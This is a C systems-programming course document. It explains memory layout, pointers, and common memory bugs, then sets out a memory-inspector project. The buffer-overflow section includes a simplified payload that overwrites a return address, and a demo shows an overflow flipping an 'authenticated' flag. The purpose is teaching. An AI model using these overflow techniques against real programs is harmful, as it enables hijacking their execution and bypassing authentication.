
SPRINT 1 REAL WORLD PROJECTS

Sprint 1: Memory & Control - Real World Projects

Goal: Deeply understand memory management and control in C—what memory actually is, why it’s dangerous, how to master it, and why this knowledge is the foundation of all systems programming.


Project Overview Table

| # | Project | Core Topics Covered | Difficulty |
|---|---------|---------------------|------------|
| 1 | Memory Inspector Tool | Pointers & Addresses, Stack vs Heap Visualization, Memory Layout, %p Formatting, lldb Debugging | Intermediate |
| 2 | Safe String Library | C String Internals, Null Terminators, Buffer Overflow Prevention, Bounds Checking, Pointer Arithmetic | Intermediate |
| 3 | Memory Leak Detector | malloc/free Tracking, Memory Leaks, Double-Free Detection, Use-After-Free, Object Lifetime & Ownership | Intermediate |
| 4 | Arena Allocator | Bump Allocation, Custom Allocators, mmap System Call, Memory Alignment, O(1) Allocation/Bulk-Free | Intermediate |
| 5 | Exploit Lab (Buffer Overflow) | Buffer Overflow Exploitation, Stack Frame Layout, Return Address Overwriting, ASLR/Canaries/NX, Security Mitigations | Advanced |

Why Memory & Control Matters

In 1972, Dennis Ritchie created C at Bell Labs to rewrite Unix. His design choice was radical: give programmers direct access to memory addresses. No safety net. No garbage collector. Just raw power and raw responsibility.

That decision shaped the next 50 years of computing:

  • The Linux kernel (30+ million lines of C) runs on 96.3% of the world’s top 1 million web servers
  • Many of the best-known security vulnerabilities, including Heartbleed (a buffer over-read in OpenSSL) and the Morris Worm (a stack buffer overflow in fingerd), exploited C memory bugs
  • CVE statistics: Microsoft and the Chromium project have each reported that roughly 70% of their serious security bugs are memory safety issues
  • The billion-dollar bugs: Buffer overflows alone have caused estimated damages in the tens of billions of dollars

Why does C remain dominant despite these dangers? Because understanding memory is understanding computing:

High-level abstraction          What you think happens
        ↓
    let x = [1, 2, 3]     →     "Create an array"
        ↓
Low-level reality               What actually happens
        ↓
    malloc(12)            →     Ask OS for 12 bytes at address 0x7f3a...
    *(int*)ptr = 1        →     Write 00000001 to bytes 0-3
    *(int*)(ptr+4) = 2    →     Write 00000002 to bytes 4-7
    *(int*)(ptr+8) = 3    →     Write 00000003 to bytes 8-11

High-Level Abstraction vs Low-Level Reality

Every Python list, every JavaScript object, every Rust Vec—underneath, it’s all pointers and bytes. Languages just hide this from you. C shows you the truth.

The Memory Hierarchy: What You’re Really Working With

Memory Hierarchy Diagram

When you write int x = 42;, you’re not just “storing a number”: you’re participating in this entire hierarchy. Code that respects the hierarchy (for example, by keeping frequently used data contiguous so it stays in cache) can run many times faster than a naive implementation that ignores it.


Core Concept Analysis

The Big Picture: A Process’s Memory Layout

When your program runs, the operating system gives it a virtual address space. Here’s what it looks like:

High addresses (0xFFFFFFFF...)
┌────────────────────────────┐
│         Kernel Space       │  ← You can't touch this
│    (OS code and data)      │
├────────────────────────────┤ 0x7FFF...
│                            │
│          Stack             │  ← Local variables, return addresses
│            ↓               │    Grows DOWN toward lower addresses
│                            │
│         (empty)            │
│                            │
│            ↑               │
│          Heap              │  ← malloc'd memory
│                            │    Grows UP toward higher addresses
├────────────────────────────┤
│          BSS               │  ← Uninitialized global variables
├────────────────────────────┤
│          Data              │  ← Initialized global variables
├────────────────────────────┤
│          Text              │  ← Your compiled code (read-only)
└────────────────────────────┘
Low addresses (0x00000000...)

Process Virtual Memory Layout

Every C program you write operates within this structure. Let’s break down each region:

1. The Stack: Automatic Memory Management

The stack is where local variables live. It’s called a “stack” because it works exactly like a stack of plates:

void foo() {
    int a = 1;        // Pushed onto stack
    int b = 2;        // Pushed onto stack
    bar();            // bar's frame pushed on top
}                     // a and b automatically "popped" (destroyed)

Stack during foo():
┌─────────────────────┐ High addresses
│   Return address    │  ← Where to go after foo() returns
├─────────────────────┤
│   Saved registers   │  ← Previous function's state
├─────────────────────┤
│   int b = 2         │  ← Local variable
├─────────────────────┤
│   int a = 1         │  ← Local variable
├─────────────────────┤
│   ...               │
└─────────────────────┘ Low addresses (stack grows down)

Stack Frame During foo()

Key insight: The stack is fast (allocating just moves a pointer) but limited (8 MB by default on most Linux systems). It’s also ephemeral: when a function returns, its stack frame is gone. That’s why dereferencing a pointer to a local variable after its function has returned is undefined behavior.

2. The Heap: Manual Memory Management

The heap is where malloc() gets memory. Unlike the stack, you control when memory is allocated and freed:

int* create_array(int size) {
    int* arr = malloc(size * sizeof(int));  // Ask heap for memory
    return arr;                              // Valid! Heap memory persists
}                                            // But who frees it?

Heap layout (simplified):
┌────────────────────────────────────────────┐
│ Header │         User Data                 │ ← malloc(100)
│ 8 bytes│         100 bytes                 │
├────────┼───────────────────────────────────┤
│ Header │  Free space (fragmented)          │ ← Was freed
├────────┼───────────────────────────────────┤
│ Header │         User Data                 │ ← malloc(50)
│ 8 bytes│         50 bytes                  │
└────────┴───────────────────────────────────┘

Heap Layout

Key insight: Most malloc() implementations store metadata (size, in-use flag) next to each block. That’s how free() knows how much to deallocate. Corrupt this metadata, and you corrupt the heap allocator itself.

3. Pointers: Just Numbers That Are Addresses

A pointer is not magic. It’s just a number that happens to be interpreted as a memory address:

int x = 42;
int* p = &x;

// What's actually happening:
// x lives at address 0x7ffeefbff4ac
// p contains the VALUE 0x7ffeefbff4ac
// *p means "go to that address and read the int there"

printf("Value of p: %p\n", (void*)p);     // 0x7ffeefbff4ac
printf("Value of *p: %d\n", *p);           // 42
printf("Value of x: %d\n", x);             // 42

Pointer arithmetic follows type sizes:

int arr[3] = {10, 20, 30};
int* p = arr;

p + 1  // Not "address + 1 byte"
       // It's "address + sizeof(int) bytes"
       // So p + 1 points to arr[1], not some random byte

Pointer Arithmetic Visualization:

Memory Addresses and Values (int = 4 bytes):

Address:     0x1000         0x1004         0x1008         0x100C
             ┌──────────┐   ┌──────────┐   ┌──────────┐   ┌──────────┐
Value:       │    10    │   │    20    │   │    30    │   │  (next)  │
             └──────────┘   └──────────┘   └──────────┘   └──────────┘
                  ▲              ▲              ▲
                  │              │              │
                  p            p+1            p+2

Key Insight: p + 1 moves by sizeof(int) = 4 bytes, NOT 1 byte!

If p were a char*:
Address:     0x1000    0x1001    0x1002    0x1003
             ┌─────┐   ┌─────┐   ┌─────┐   ┌─────┐
Value:       │ 'A' │   │ 'B' │   │ 'C' │   │ 'D' │
             └─────┘   └─────┘   └─────┘   └─────┘
                ▲         ▲
                │         │
                p       p+1

Now p + 1 moves by sizeof(char) = 1 byte

Pointer Arithmetic Visualization

4. Memory Bugs: What Can Go Wrong

Every memory bug falls into a few categories. Understanding them is understanding why C is dangerous:

Buffer Overflow

char buffer[10];
strcpy(buffer, "This string is way too long!");
// Overwrites memory PAST the buffer
// Could overwrite return address → attacker controls execution

Buffer Overflow Stack Corruption - Step by Step:

STEP 1: Normal Stack Frame BEFORE strcpy
========================================
Function: vulnerable()
  char buffer[10];
  strcpy(buffer, "This string is way too long!");

Stack Layout:
High Addresses (grows DOWN)
┌──────────────────────────┐
│  Return Address          │  ← 0x7fff5000  Where to go after function returns
│  (points to caller)      │               (e.g., 0x400123)
├──────────────────────────┤
│  Saved Frame Pointer     │  ← 0x7fff4ff8
├──────────────────────────┤
│  buffer[9]               │  ← 0x7fff4fef
│  buffer[8]               │
│  buffer[7]               │
│  buffer[6]               │
│  buffer[5]               │
│  buffer[4]               │
│  buffer[3]               │
│  buffer[2]               │
│  buffer[1]               │
│  buffer[0]               │  ← 0x7fff4fe6  (buffer starts here)
├──────────────────────────┤
│  (other locals)          │
└──────────────────────────┘
Low Addresses

STEP 2: During strcpy - Bytes Being Written
============================================
Source: "This string is way too long!\0"  (29 bytes: 28 characters + terminator!)
Dest:   buffer (only 10 bytes allocated!)

┌──────────────────────────┐
│  Return Address          │  ← Will be OVERWRITTEN!
│  0x400123 → 0x676E6F6C  │     (becomes "long" in ASCII!)
├──────────────────────────┤
│  Saved Frame Pointer     │  ← Will be OVERWRITTEN!
│  → 0x6F742079            │     (becomes "y to" in ASCII!)
├──────────────────────────┤
│  'g' '!' '\0' [overflow] │  ← PAST END OF BUFFER
│  'n' 'o' 'l' ' '         │  ← PAST END OF BUFFER
│  'o' 't' ' ' 'y'         │  ← PAST END OF BUFFER
│  's' ' ' 'w' 'a'         │
│  'T' 'h' 'i' 's'         │  ← buffer[0-9] (valid)
├──────────────────────────┤

STEP 3: After strcpy - CORRUPTED!
==================================
┌──────────────────────────┐
│  Return Address          │
│  0x676E6F6C ("long")     │  ← CORRUPTED! Not a valid code address
├──────────────────────────┤
│  Saved Frame Pointer     │
│  0x6F742079              │  ← CORRUPTED!
├──────────────────────────┤
│  'g' '!' '\0'            │
│  'n' 'o' 'l' ' '         │
│  'o' 't' ' ' 'y'         │
│  's' ' ' 'w' 'a'         │
│  'T' 'h' 'i' 's'         │
└──────────────────────────┘

STEP 4: When Function Returns - CRASH!
=======================================
CPU tries to:
  1. Pop return address from stack → gets 0x676E6F6C
  2. Jump to that address
  3. 0x676E6F6C is NOT valid executable code!
  4. SEGMENTATION FAULT!

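With a carefully crafted input (simplified: a real payload must also fill the
saved frame pointer and any padding before it reaches the return address):
  strcpy(buffer, "AAAAAAAAAA" "\xef\xbe\xad\xde");
                  ↑ 10 filler bytes ↑ Attacker's address, little-endian

  Return address becomes 0xdeadbeef → attacker controls execution!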

Buffer Overflow Stack Corruption

Use-After-Free

int* p = malloc(sizeof(int));
*p = 42;
free(p);
// p still contains the old address, but memory is now "free"
*p = 100;  // UNDEFINED! Memory might be reused

Memory Bug Lifecycle - Use-After-Free Timeline:

Timeline of a Use-After-Free Bug:

T=0: Allocation
     ┌──────────────────────┐
     │ int* p = malloc(...) │──┐
     └──────────────────────┘  │
                               ▼
     Heap: [p → 0x1000] → ┌─────────┐
                          │   42    │  Status: VALID
                          └─────────┘

T=1: Use (OK)
     ┌────────┐
     │ *p = 42│  ✓ Works fine
     └────────┘

T=2: Free
     ┌──────────┐
     │ free(p)  │──┐
     └──────────┘  │
                   ▼
     Heap: [p → 0x1000] → ┌─────────┐
                          │   42    │  Status: FREED (memory returned to allocator)
                          └─────────┘
                          p is now a DANGLING POINTER!

T=3: Reuse (somewhere else in program)
     ┌────────────────────────────┐
     │ char* s = malloc(4);       │──┐
     │ strcpy(s, "ABC");          │  │
     └────────────────────────────┘  ▼
     Heap: [s → 0x1000] → ┌─────────┐
           [p → 0x1000] → │  "ABC"  │  SAME ADDRESS REUSED!
                          └─────────┘

T=4: Use-After-Free BUG!
     ┌─────────┐
     │ *p = 100│  ← Writing to freed memory!
     └─────────┘
           │
           ▼
     Heap: [s → 0x1000] → ┌─────────┐
           [p → 0x1000] → │   100   │  CORRUPTED s's data!
                          └─────────┘

     Result: Undefined behavior! Could:
     - Silently corrupt other data (like above)
     - Crash immediately
     - Work fine (memory not yet reused) ← WORST: bug appears later!
     - Security vulnerability (attacker controls what's at that address)

Use-After-Free Timeline

Double-Free

int* p = malloc(sizeof(int));
free(p);
free(p);  // UNDEFINED! May corrupt the allocator's metadata or abort the program
          // If it goes undetected, a later malloc might return garbage

Double-Free Heap Corruption:

How Double-Free Corrupts the Heap Allocator:

INITIAL STATE - Normal Heap:
┌────────────────────────────────────────────────────┐
│ Header: size=16, in_use=1 │  User Data (p points  │
│         prev=NULL          │  here)                │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │  Other allocation     │
└────────────────────────────────────────────────────┘

AFTER FIRST free(p) - Correct:
┌────────────────────────────────────────────────────┐
│ Header: size=16, in_use=0 │  Free block           │  ← Added to free list
│         next_free → ...    │  (available for      │
│         prev_free → ...    │   reuse)             │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │  Other allocation     │
└────────────────────────────────────────────────────┘

Free List: HEAD → [Block at p] → [Other free blocks] → NULL

AFTER SECOND free(p) - CORRUPTED:
┌────────────────────────────────────────────────────┐
│ Header: CORRUPTED!         │  Double-freed block  │
│         next_free → ITSELF │  ← Creates loop or   │
│         prev_free → ???    │     invalid pointers │
├────────────────────────────────────────────────────┤
│ Header: size=32, in_use=1 │  Other allocation     │
└────────────────────────────────────────────────────┘

Free List: HEAD → [Block at p] → [Block at p] → ∞ LOOP!
                        ↓               ↑
                        └───────────────┘

CONSEQUENCES:
1. Free list is now circular or has invalid pointers
2. Next malloc() might:
   - Return the same address twice → two pointers to same memory
   - Crash when traversing corrupted free list
   - Return garbage/invalid addresses
3. Heap metadata is corrupted → future mallocs are unpredictable
4. Security risk: Attacker can exploit to write arbitrary memory

Example of the damage:
  int* a = malloc(16);     // Might get address 0x1000
  int* b = malloc(16);     // Might ALSO get 0x1000! (same memory!)
  *a = 42;
  *b = 100;
  printf("%d\n", *a);      // Prints 100! (a and b are aliased)

Double-Free Heap Corruption

Memory Leak

void leak() {
    int* p = malloc(1000);
    // Function returns without free(p)
    // Those 1000 bytes are now unreachable but still allocated
}
// Call leak() 1000 times → 1MB of leaked memory

5. Why C Doesn’t Protect You

Other languages prevent these bugs through:

| Language | Protection Mechanism |
|----------|----------------------|
| Java/Go | Garbage collector (no manual free) |
| Rust | Ownership system (compile-time checks) |
| Python | Reference counting + GC |
| JavaScript | GC + no pointer arithmetic |

C gives you none of this. Why?

  1. Performance: Every safety check costs cycles
  2. Control: Sometimes you NEED to do “unsafe” things (OS kernels, device drivers)
  3. Simplicity: C’s model maps directly to hardware
  4. History: C was designed when computers had 64KB of RAM

The tradeoff: C trusts you completely. With that trust comes power—and responsibility.


Tools for Seeing Memory

You can’t master what you can’t observe. These tools make memory visible:

1. lldb/gdb: The Debugger

$ lldb ./my_program
(lldb) breakpoint set --name main
(lldb) run
(lldb) frame variable           # Show local variables
(lldb) memory read &x           # Show raw bytes at address of x
(lldb) register read            # Show CPU registers

2. AddressSanitizer: The Bug Finder

$ clang -fsanitize=address -g my_program.c -o my_program
$ ./my_program
# If there's a memory bug, you get a detailed report:
# ==12345==ERROR: AddressSanitizer: heap-use-after-free
# READ of size 4 at 0x602000000010

3. Valgrind: The Memory Profiler

$ valgrind --leak-check=full ./my_program
# Reports all memory leaks, invalid reads/writes
# Slower but catches more bugs

4. printf debugging (sometimes the best tool)

printf("x is at %p, value = %d\n", (void*)&x, x);
printf("p is at %p, points to %p, *p = %d\n", (void*)&p, (void*)p, *p);

Concept Summary Table

| Concept Cluster | What You Need to Internalize |
|-----------------|------------------------------|
| Memory as bytes | Memory is just numbered boxes. Everything is bytes with interpretation layered on top. |
| The stack | Automatic, fast, limited. Local variables live here. Grows down. LIFO. |
| The heap | Manual, flexible, fragmentation-prone. malloc/free. You control lifetime. |
| Pointers as addresses | A pointer is just a number that happens to be an address. Arithmetic follows type sizes. |
| Ownership & lifetime | Who “owns” memory? When does it become invalid? Why can’t the compiler always know? |
| Failure modes | Buffer overflow, use-after-free, double-free, memory leak: these aren’t abstract, they’re observable. |
| Tooling | lldb and sanitizers show you what’s actually happening vs. what you think is happening. |

Deep Dive Reading by Concept

This section maps each concept from above to specific book chapters for deeper understanding. Read these before or alongside the projects to build strong mental models.

Memory Fundamentals (What Memory Actually Is)

| Concept | Book & Chapter |
|---------|----------------|
| How data is represented in memory | Write Great Code, Volume 1 by Randall Hyde, Ch. 2: “Numeric Representation” & Ch. 4: “Floating-Point Representation” |
| Memory as numbered bytes | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron, Ch. 2: “Representing and Manipulating Information” (sections 2.1–2.2) |
| Virtual vs. physical memory | Operating Systems: Three Easy Pieces by Arpaci-Dusseau, Part II: “Virtualization” (Ch. 13-15: “Address Spaces”, “Memory API”, “Address Translation”) |
| How the CPU sees memory | Code: The Hidden Language of Computer Hardware and Software by Charles Petzold, Ch. 16: “An Assemblage of Memory” & Ch. 17: “Automation” |

The Stack (Automatic Memory)

| Concept | Book & Chapter |
|---------|----------------|
| Function call mechanics | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron, Ch. 3.7: “Procedures” |
| Stack frames and layout | Low-Level Programming by Igor Zhirkov, Ch. 4: “Virtual Memory” & Ch. 5: “Compilation Pipeline” (section on calling conventions) |
| Why stack grows down | The Secret Life of Programs by Jonathan Steinhart, Ch. 5: “Where Am I?” (memory layout) |
| Recursion and stack overflow | C Primer Plus by Stephen Prata, Ch. 9: “Functions” (section on recursion) |

The Heap (Manual Memory)

| Concept | Book & Chapter |
|---------|----------------|
| How malloc/free work | The C Programming Language by Kernighan & Ritchie, Ch. 8.7: “Example - A Storage Allocator” |
| Heap data structures | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron, Ch. 9.9: “Dynamic Memory Allocation” |
| Memory fragmentation | C Interfaces and Implementations by David Hanson, Ch. 5: “Arena” & Ch. 6: “Mem” |
| System calls for memory | The Linux Programming Interface by Michael Kerrisk, Ch. 7: “Memory Allocation” |

Pointers (The Heart of C)

| Concept | Book & Chapter |
|---------|----------------|
| What pointers really are | Understanding and Using C Pointers by Richard Reese, Ch. 1: “Introduction” & Ch. 2: “Dynamic Memory Management” |
| Pointer arithmetic | The C Programming Language by Kernighan & Ritchie, Ch. 5: “Pointers and Arrays” |
| Pointers and arrays relationship | Expert C Programming by Peter van der Linden, Ch. 4: “The Shocking Truth: C Arrays and Pointers Are NOT the Same!” |
| Function pointers | C Primer Plus by Stephen Prata, Ch. 14: “Structures and Other Data Forms” (section on function pointers) |
| Void pointers and casting | 21st Century C by Ben Klemens, Ch. 6: “Your Pal the Pointer” |

Memory Safety & Vulnerabilities

| Concept | Book & Chapter |
|---------|----------------|
| Buffer overflow mechanics | Hacking: The Art of Exploitation by Jon Erickson, Ch. 3: “Exploitation” (0x300 sections) |
| Why C doesn’t protect you | Effective C by Robert Seacord, Ch. 2: “Objects, Functions, and Types” & Ch. 7: “Characters and Strings” |
| Common C security pitfalls | Secure Coding in C and C++ by Robert Seacord, Ch. 2: “Strings” & Ch. 4: “Dynamic Memory Management” |
| Use-after-free and dangling pointers | Understanding and Using C Pointers by Richard Reese, Ch. 2: “Dynamic Memory Management” (section on dangling pointers) |

Memory Debugging & Tools

| Concept | Book & Chapter |
|---------|----------------|
| Using debuggers effectively | The Art of Debugging with GDB, DDD, and Eclipse by Matloff & Salzman, Ch. 1-3: Basics of GDB |
| Understanding memory with lldb | Low-Level Programming by Igor Zhirkov, Ch. 6: “Interrupts and System Calls” (debugger sections) |
| Reading assembly to understand memory | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron, Ch. 3: “Machine-Level Representation of Programs” (focus on 3.1–3.5) |

Process Memory Layout

| Concept | Book & Chapter |
|---------|----------------|
| Complete process memory map | Computer Systems: A Programmer’s Perspective by Bryant & O’Hallaron, Ch. 9: “Virtual Memory” (especially 9.7-9.8) |
| ELF format and sections | Practical Binary Analysis by Dennis Andriesse, Ch. 2: “The ELF Format” |
| How programs are loaded | The Linux Programming Interface by Michael Kerrisk, Ch. 6: “Processes” |

Essential Reading Order

For maximum comprehension, read in this order:

  1. Foundation (Week 1):
    • Computer Systems Ch. 2 (data representation)
    • The C Programming Language Ch. 5 (pointers)
    • Understanding and Using C Pointers Ch. 1-2 (pointer mastery)
  2. Stack & Heap (Week 2):
    • Computer Systems Ch. 3.7 (procedures/stack)
    • Computer Systems Ch. 9.9 (dynamic allocation)
    • The C Programming Language Ch. 8.7 (allocator example)
  3. Safety & Exploitation (Week 3):
    • Effective C Ch. 7 (strings and safety)
    • Hacking: The Art of Exploitation Ch. 3 (seeing bugs in action)
  4. Deep Understanding (Week 4+):
    • Operating Systems: Three Easy Pieces Part II (virtual memory)
    • C Interfaces and Implementations Ch. 5-6 (allocator design)

Project 1: Memory Inspector Tool

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Programming Language: C
  • Coolness Level: Level 3: Genuinely Clever
  • Business Potential: 2. The “Micro-SaaS / Pro Tool”
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Memory Management / Systems Programming
  • Software or Tool: Memory Profiler
  • Main Book: “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron

What you’ll build: A command-line tool that visualizes the memory layout of C programs—showing stack frames, heap allocations, variable addresses, and how they change during execution.

Why it teaches memory & control: This forces you to see memory the way lldb sees it. You’ll print addresses, observe stack growth, watch heap fragmentation, and understand that “memory” is just a big array of bytes with conventions layered on top. By building something that displays memory, you have to truly understand what memory is.

Core challenges you’ll face:

  • Printing addresses with %p and understanding what they mean (maps to: what memory is)
  • Observing that stack addresses decrease as you go deeper (maps to: stack layout)
  • Watching heap addresses and understanding malloc return values (maps to: heap layout)
  • Creating a struct and dumping its raw bytes (maps to: bytes & interpretation)
  • Demonstrating what happens when you access freed memory (maps to: use-after-free)

Key Concepts:

| Concept | Resource |
|---------|----------|
| Pointer fundamentals | “Understanding and Using C Pointers” Ch. 1-2 - Richard Reese |
| Stack vs Heap visualization | LLDB Tutorial - memory read command |
| Address interpretation | PDR: LLDB Tutorial - Frame inspection |

  • Difficulty: Beginner
  • Time estimate: Weekend
  • Prerequisites: Basic C syntax, compiling with gcc/clang


Real World Outcome

When you run your memory inspector tool, you’ll see detailed, educational output showing exactly where variables live in memory and how the stack and heap are organized. Here are real examples of what your tool will produce:

Example 1: Stack vs Heap Visualization

$ ./memory_inspector

=== MEMORY INSPECTOR TOOL ===

[STACK VARIABLES]
Variable 'x' (int):
  Address: 0x7ffeefbff4ac
  Value: 42
  Size: 4 bytes
  Location: STACK (high address)

Variable 'y' (double):
  Address: 0x7ffeefbff4a0
  Value: 3.14159
  Size: 8 bytes
  Location: STACK (high address)

[HEAP ALLOCATIONS]
Pointer 'p' points to:
  Address: 0x600000004000
  Value: 100
  Size: 4 bytes
  Location: HEAP (low address)

Pointer 'arr' points to:
  Address: 0x600000004010
  Values: [1, 2, 3, 4, 5]
  Size: 20 bytes (5 integers)
  Location: HEAP (low address)

[MEMORY LAYOUT DIAGRAM]
High Addresses (Stack)
┌─────────────────────────────────┐
│ 0x7ffeefbff4ac: x = 42          │  ← Stack (automatic storage)
│ 0x7ffeefbff4a0: y = 3.14159     │
└─────────────────────────────────┘
           ... gap ...
┌─────────────────────────────────┐
│ 0x600000004000: *p = 100        │  ← Heap (dynamic allocation)
│ 0x600000004010: arr[0..4]       │
└─────────────────────────────────┘
Low Addresses (Heap)

Stack grows DOWN (toward lower addresses)
Heap grows UP (toward higher addresses)

Example 2: Function Call Stack Frame Inspection

$ ./memory_inspector --show-frames

=== STACK FRAME VISUALIZATION ===

Calling sequence: main() → foo() → bar()

[In bar() - Current Frame]
  Local variable 'z' at 0x7ffeefbff47c = 30
  Stack pointer (approx): 0x7ffeefbff478

[In foo() - Previous Frame]
  Local variable 'y' at 0x7ffeefbff49c = 20
  Return address: 0x400685
  Frame distance from bar: 32 bytes

[In main() - Base Frame]
  Local variable 'x' at 0x7ffeefbff4bc = 10
  Frame distance from foo: 32 bytes

ASCII Stack Layout:
┌────────────────────────────────┐ ← 0x7ffeefbff4c0 (main's frame top)
│  main(): int x = 10            │
│  Return address to OS          │
├────────────────────────────────┤ ← 0x7ffeefbff4a0
│  foo(): int y = 20             │
│  Return address to main        │
├────────────────────────────────┤ ← 0x7ffeefbff480
│  bar(): int z = 30             │   ← Current execution point
│  Return address to foo         │
└────────────────────────────────┘ ← 0x7ffeefbff478 (stack pointer)

Notice: Stack addresses DECREASE as we go deeper into function calls!

Example 3: Memory Corruption Detection

$ ./memory_inspector --demo-corruption

=== BEFORE BUFFER OVERFLOW ===

Buffer location: 0x7ffeefbff490
Buffer contents: "HELLO"
Buffer size: 10 bytes

Target variable 'authenticated': 0x7ffeefbff49e
Value: 0 (FALSE)

Memory layout:
0x7ffeefbff490: [H][E][L][L][O][\0][ ][ ][ ][ ]  ← buffer[10]
0x7ffeefbff49a: [ ][ ][ ][ ]
0x7ffeefbff49e: [00][00][00][00]                 ← authenticated (int)

=== AFTER BUFFER OVERFLOW ===

Wrote 16 bytes to 10-byte buffer!

Memory layout:
0x7ffeefbff490: [H][E][L][L][O][W][O][R][L][D]  ← buffer[10] OVERFLOWED
0x7ffeefbff49a: [!][!][!][!]                     ← Overwrite started here!
0x7ffeefbff49e: [21][21][00][00]                 ← authenticated CORRUPTED!

Target variable 'authenticated': 0x7ffeefbff49e
Value: 8481 (TRUE - CORRUPTED!)

⚠️  WARNING: Buffer overflow detected!
    Bytes written: 16
    Buffer capacity: 10
    Overflow: 6 bytes
    Memory corruption: authenticated variable changed from 0 to 8481

Example 4: Raw Bytes and Endianness

$ ./memory_inspector --show-bytes

=== RAW BYTE INSPECTION ===

Integer: 0x12345678 (305419896 in decimal)
Address: 0x7ffeefbff4ac
Size: 4 bytes

Byte-by-byte breakdown (Little-Endian on x86-64):
  Byte 0 at 0x7ffeefbff4ac: 0x78 (least significant)
  Byte 1 at 0x7ffeefbff4ad: 0x56
  Byte 2 at 0x7ffeefbff4ae: 0x34
  Byte 3 at 0x7ffeefbff4af: 0x12 (most significant)

Memory visualization:
  Lower Address                    Higher Address
  ↓                                ↓
  [78][56][34][12]
   ↑             ↑
   LSB           MSB

Note: On little-endian systems (x86/x64), bytes are stored
      in reverse order - least significant byte first!

Struct padding demonstration:
struct Example {
    char c;      // 1 byte
    // 3 bytes padding
    int i;       // 4 bytes
    char d;      // 1 byte
    // 7 bytes padding
    double e;    // 8 bytes
} ex;

Address: 0x7ffeefbff490
Total size: 24 bytes (not 14!)

Memory layout:
0x7ffeefbff490: [c ][  ][  ][  ]  ← char + 3 padding bytes
0x7ffeefbff494: [i i][i i]        ← int (aligned to 4)
0x7ffeefbff498: [d ][  ][  ][  ]  ← char + 3 padding
0x7ffeefbff49c: [  ][  ][  ][  ]  ← 4 more padding bytes
0x7ffeefbff4a0: [e e e e e e e e]  ← double (aligned to 8)

Wasted space: 10 bytes (41.7% padding!)

These outputs demonstrate that you’ve built a tool that makes the invisible visible - showing exactly how C represents data in memory, where variables live, and how memory corruption happens at the byte level.

Learning milestones:

  1. First milestone: You can explain why &x and x are different, and what *p actually does
  2. Second milestone: You can predict whether a variable is on stack or heap by looking at its address
  3. Final milestone: You instinctively think of memory as numbered bytes, not abstract “variables”

The Core Question You’re Answering

“What IS memory? Where do my variables actually live, and how can I see them?”

Before you write any code, sit with this question. Most developers have a vague sense of “variables” but can’t explain what that actually means at the hardware level. A variable is just a label for a location in a giant array of bytes.


Concepts You Must Understand First

Stop and research these before coding:

  1. Memory as Numbered Bytes
    • What does it mean that memory is “just bytes”?
    • How is an int stored differently than a char?
    • What is the difference between a value and an address?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 2 - Bryant & O’Hallaron
  2. The Address-of Operator (&)
    • What does &x actually return?
    • Why is this number different every time you run the program? (ASLR)
    • What’s the relationship between &x and *(&x)?
  3. Pointers as Numbers
    • If a pointer is just a number, what makes it special?
    • What does “dereferencing” mean in terms of hardware operations?
    • Why is int* different from char* if both are just addresses?
    • Book Reference: “Understanding and Using C Pointers” Ch. 1 - Richard Reese
  4. Stack vs Heap Layout
    • Why do stack addresses go downward and heap addresses go upward?
    • What is the “stack pointer”?
    • Why is the stack fast and the heap slow?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Bryant & O’Hallaron

Questions to Guide Your Design

Before implementing, think through these:

  1. Displaying Addresses
    • How do you print an address in C? (%p)
    • What format is the address printed in? (Hexadecimal)
    • What does a typical stack address look like vs a heap address?
  2. Visualizing Stack Frames
    • How can you show that calling a function creates a new stack frame?
    • If you call foo() which calls bar(), how do their local variables relate in memory?
    • How do you demonstrate that returning from a function “destroys” its local variables?
  3. Observing Heap Allocations
    • When you call malloc(100), what address do you get?
    • If you call malloc(100) twice, how far apart are the addresses?
    • What happens to those addresses after free()?
  4. Raw Byte Inspection
    • How do you print the individual bytes of an integer?
    • What’s the difference between big-endian and little-endian?
    • How do you see padding bytes in a struct?

Thinking Exercise: Trace Memory by Hand

Before coding, trace this on paper:

#include <stdio.h>
#include <stdlib.h>

void bar(void) {
    int z = 30;
    printf("z at %p\n", (void*)&z);
}

void foo(void) {
    int y = 20;
    printf("y at %p\n", (void*)&y);
    bar();
}

int main(void) {
    int x = 10;
    printf("x at %p\n", (void*)&x);
    foo();

    int* heap = malloc(sizeof(int));
    *heap = 100;
    printf("heap at %p\n", (void*)heap);
    free(heap);
    return 0;
}

Questions while tracing:

  • Draw a diagram of the stack at the moment bar() is executing
  • Which address is highest: &x, &y, or &z? Why?
  • Where does the heap allocation fit in your diagram?
  • What happens to &z after bar() returns?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What is the difference between &x and x?”
  2. “How can you tell if an address is on the stack or the heap?”
  3. “What happens to a local variable when a function returns?”
  4. “What is a pointer, really?”
  5. “Why does the stack grow downward on x86?”
  6. “What is ASLR and why does it exist?”

Hints in Layers (Only If Stuck)

Hint 1: Start with printf

Your first program should just print addresses:

```c
int x = 10;
printf("x is at address %p\n", (void*)&x);
```

Run it multiple times. Notice how the address changes (ASLR).

Hint 2: Compare Stack Depths

Create nested functions and print addresses from each. You'll see addresses decreasing as you go deeper. This shows stack growth direction.

Hint 3: Dump Raw Bytes

Cast any variable to `unsigned char*` and print each byte:

```c
int x = 0x12345678;
unsigned char* bytes = (unsigned char*)&x;
for (int i = 0; i < sizeof(int); i++) {
    printf("Byte %d: 0x%02x\n", i, bytes[i]);
}
```

You'll see endianness in action.

Hint 4: Use lldb

Compile with `-g` and use lldb to verify your understanding:

```
lldb ./program
breakpoint set --name main
run
frame variable
memory read &x
```

Books That Will Help

| Topic | Book | Chapter |
|-------|------|---------|
| What memory really is | “Computer Systems: A Programmer’s Perspective” | Ch. 2 |
| Pointers from first principles | “Understanding and Using C Pointers” | Ch. 1-2 |
| Stack and function calls | “Computer Systems: A Programmer’s Perspective” | Ch. 3.7 |
| Seeing memory with debuggers | “The Art of Debugging with GDB, DDD, and Eclipse” | Ch. 1-3 |
| Process memory layout | “The Linux Programming Interface” | Ch. 6 |

Project 2: Safe String Library

